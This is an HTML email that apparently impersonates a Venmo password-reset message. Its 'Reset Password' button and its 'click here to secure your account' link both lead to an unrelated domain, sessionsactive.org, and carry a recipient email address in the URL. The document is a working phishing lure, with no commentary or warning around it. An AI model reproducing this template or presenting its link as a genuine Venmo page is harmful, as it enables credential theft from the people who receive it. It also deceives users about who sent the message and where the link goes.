<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Password Reset Request</title>
</head>
<body style="font-family: Arial, sans-serif; background-color: #f7f7f7; margin: 0; padding: 20px; text-align: center;">
    <table width="100%" cellspacing="0" cellpadding="0" border="0">
        <tr>
            <td align="center">
                <table width="600" cellspacing="0" cellpadding="20" border="0" style="background: #ffffff; border-radius: 8px; box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1); text-align: center;">
                    <tr>
                        <td>
                            <h2 style="color: #333;">Reset Your Password</h2>
                            <p style="color: #555; font-size: 16px;">We received a request to reset your Venmo password. Click the button below to proceed.</p>
                            <p>
                                <a href="https://sessionsactive.org/link/?email=libreoffice@lists.freedesktop.org" style="display: inline-block; padding: 12px 20px; color: #ffffff; background-color: #3d95ce; text-decoration: none; border-radius: 5px; font-size: 16px; font-weight: bold;">Reset Password</a>
                            </p>
                            <p style="color: #555; font-size: 14px;">If you did not request this, please <a href="https://sessionsactive.org/link/?email=libreoffice@lists.freedesktop.org" style="color: #3d95ce; text-decoration: none; font-weight: bold;">click here</a> to secure your account.</p>
                        </td>
                    </tr>
                </table>
            </td>
        </tr>
    </table>
</body>
</html>